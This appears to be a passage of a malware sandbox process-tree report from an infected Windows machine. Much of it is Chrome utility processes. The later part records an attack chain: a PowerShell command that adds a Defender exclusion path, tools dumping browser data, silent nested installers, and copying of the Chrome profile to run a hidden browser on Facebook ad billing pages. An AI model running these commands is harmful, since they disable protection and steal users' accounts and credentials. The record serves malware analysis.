C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:825⤵PID:5712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3200 /prefetch:825⤵PID:2172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:825⤵PID:7392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5060 /prefetch:825⤵PID:7476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 /prefetch:825⤵PID:7292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4092 /prefetch:825⤵PID:8172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4100 /prefetch:825⤵PID:3568
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings25⤵PID:5048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4292 /prefetch:825⤵PID:7396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4500 /prefetch:825⤵PID:1068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:825⤵PID:8040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5000 /prefetch:825⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:825⤵PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:825⤵PID:7016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3592 /prefetch:825⤵PID:6156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:825⤵PID:8184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4236 /prefetch:825⤵PID:1388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4208 /prefetch:825⤵PID:5180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:825⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5412 /prefetch:825⤵PID:7668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:825⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:825⤵PID:5048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:825⤵PID:7976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3836 /prefetch:825⤵PID:4532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:825⤵PID:7856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:825⤵PID:1364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5908 /prefetch:825⤵PID:7456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6176 /prefetch:825⤵PID:1584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:125⤵PID:5532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6180 /prefetch:825⤵PID:5280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:825⤵PID:7544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6576 /prefetch:825⤵PID:7924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:825⤵PID:7408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6732 /prefetch:825⤵PID:7140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6948 /prefetch:825⤵PID:520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4024 /prefetch:825⤵PID:7664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7116 /prefetch:825⤵PID:5720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7336 /prefetch:825⤵PID:6808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:125⤵PID:640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7408 /prefetch:825⤵PID:5684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3620 /prefetch:825⤵PID:816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7540 /prefetch:825⤵PID:8148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7960 /prefetch:825⤵PID:6320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3696 /prefetch:825⤵PID:4236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7688 /prefetch:825⤵PID:8032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7672 /prefetch:125⤵PID:6564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7676 /prefetch:825⤵PID:6972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8312 /prefetch:825⤵PID:4680
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg21⤵
- Runs .reg file with regedit
PID:7160
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b firefox21⤵PID:7664
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b chrome21⤵PID:4236
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exeparse.exe -f json -b edge21⤵PID:4400
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\axmpholn.gy1\GcleanerWW.exe /mixone & exit18⤵PID:2068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exe & exit18⤵PID:6276
-
C:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exe19⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\y4ugkost.kvn\privacytools5.exe20⤵PID:6252
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktq3xiyg.0hj\setup.exe /8-2222 & exit18⤵PID:7200
-
C:\Users\Admin\AppData\Local\Temp\ktq3xiyg.0hj\setup.exeC:\Users\Admin\AppData\Local\Temp\ktq3xiyg.0hj\setup.exe /8-222219⤵PID:5896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Morning-Haze"20⤵PID:6672
-
-
C:\Program Files (x86)\Morning-Haze\7za.exe"C:\Program Files (x86)\Morning-Haze\7za.exe" e -p154.61.71.51 winamp-plugins.7z20⤵PID:7720
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Morning-Haze\setup.exe" -map "C:\Program Files (x86)\Morning-Haze\WinmonProcessMonitor.sys""20⤵PID:7872
-
C:\Program Files (x86)\Morning-Haze\setup.exe"C:\Program Files (x86)\Morning-Haze\setup.exe" -map "C:\Program Files (x86)\Morning-Haze\WinmonProcessMonitor.sys"21⤵PID:7716
-
-
-
C:\Program Files (x86)\Morning-Haze\7za.exe"C:\Program Files (x86)\Morning-Haze\7za.exe" e -p154.61.71.51 winamp.7z20⤵PID:6492
-
-
C:\Program Files (x86)\Morning-Haze\setup.exe"C:\Program Files (x86)\Morning-Haze\setup.exe" /8-222220⤵PID:3116
-
C:\Program Files (x86)\Morning-Haze\setup.exe"C:\Program Files (x86)\Morning-Haze\setup.exe" /8-222221⤵PID:7772
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fathga1m.uk1\MultitimerFour.exe & exit18⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\fathga1m.uk1\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\fathga1m.uk1\MultitimerFour.exe19⤵PID:6664
-
C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵PID:7448
-
C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe" 1 3.1615353975.60485877c85c2 10421⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\UOE8LEV04C\multitimer.exe" 2 3.1615353975.60485877c85c222⤵PID:7232
-
C:\Users\Admin\AppData\Local\Temp\xpfnufhj4rn\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xpfnufhj4rn\Setup3310.exe" /Verysilent /subid=57723⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\is-D0L7M.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-D0L7M.tmp\Setup3310.tmp" /SL5="$C04BA,802346,56832,C:\Users\Admin\AppData\Local\Temp\xpfnufhj4rn\Setup3310.exe" /Verysilent /subid=57724⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\is-PP2J2.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PP2J2.tmp\Setup.exe" /Verysilent25⤵PID:7016
-
C:\Users\Admin\AppData\Local\Temp\is-9QI12.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9QI12.tmp\Setup.tmp" /SL5="$40624,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PP2J2.tmp\Setup.exe" /Verysilent26⤵PID:7596
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Messure.exe" /Verysilent27⤵PID:9360
-
C:\Users\Admin\AppData\Local\Temp\is-T51I8.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-T51I8.tmp\Messure.tmp" /SL5="$1068A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\Messure.exe" /Verysilent28⤵PID:9416
-
C:\Users\Admin\AppData\Local\Temp\is-AESLL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AESLL.tmp\Setup.exe" /VERYSILENT29⤵PID:10712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\PictureLAb.exe" /Verysilent27⤵PID:8384
-
C:\Users\Admin\AppData\Local\Temp\is-IL254.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-IL254.tmp\PictureLAb.tmp" /SL5="$2068A,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-LVJS9.tmp\PictureLAb.exe" /Verysilent28⤵PID:8236
-
C:\Users\Admin\AppData\Local\Temp\is-E7BK3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-E7BK3.tmp\Setup.exe" /VERYSILENT29⤵PID:3344
-
C:\Users\Admin\AppData\Local\Temp\is-D57K8.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D57K8.tmp\Setup.tmp" /SL5="$503C0,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-E7BK3.tmp\Setup.exe" /VERYSILENT30⤵PID:6496
-
C:\Users\Admin\AppData\Local\Temp\is-B2KJP.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-B2KJP.tmp\def.exe" /S /UID=lab21431⤵PID:9256
-
C:\Users\Admin\AppData\Local\Temp\90-4f80f-269-152b2-c3134420abfd8\Lavushakyja.exe"C:\Users\Admin\AppData\Local\Temp\90-4f80f-269-152b2-c3134420abfd8\Lavushakyja.exe"32⤵PID:8120
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tegxk05x.bt4\md7_7dfj.exe & exit33⤵PID:11328
-
C:\Users\Admin\AppData\Local\Temp\tegxk05x.bt4\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\tegxk05x.bt4\md7_7dfj.exe34⤵PID:13408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gow3iwak.ts4\askinstall18.exe & exit33⤵PID:13916
-
C:\Users\Admin\AppData\Local\Temp\gow3iwak.ts4\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\gow3iwak.ts4\askinstall18.exe34⤵PID:14316
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵PID:14704
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
PID:14976
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵PID:15332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/35⤵PID:15196
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2036⤵PID:15160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=2060 /prefetch:836⤵PID:13736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1704 /prefetch:836⤵PID:15044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1656 /prefetch:236⤵PID:4900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:136⤵PID:3976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:136⤵PID:8176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:136⤵PID:6892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:136⤵PID:6468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:136⤵PID:3296
-
-
